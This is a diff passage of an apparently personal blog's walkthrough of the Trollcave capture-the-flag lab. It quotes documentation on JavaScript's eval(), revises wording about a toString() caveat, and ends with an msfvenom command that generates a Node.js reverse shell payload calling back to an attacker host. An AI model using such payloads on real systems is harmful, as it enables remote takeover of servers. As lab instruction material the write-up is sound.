limbernie/limbernie.github.io/_posts/2018-04-23-trollcave-walkthrough.md

 >The argument of the `eval()` function is a string.
 If the string represents an expression, `eval()` evaluates the expression.
 If the argument represents one or more JavaScript statements, `eval()` evaluates the statements.
 Do not call `eval()` to evaluate an arithmetic expression; JavaScript evaluates arithmetic expressions automatically.

-There is one small caveat though.
-Noticed `toString()` is appended to `eval()`?
-We just have to make sure a string is returned to whatever that was evaluated.
+One small caveat.
+Noticed `toString()` after `eval()`?
+We need to make sure the evaluation returned a string!

-Fortunately, `msfvenom` is able to generate a Node.js reverse shell payload.
+Good thing `msfvenom` was able to generate a Node.js reverse shell payload.

 ```
 # msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.30.128 LPORT=44444 -o rev.js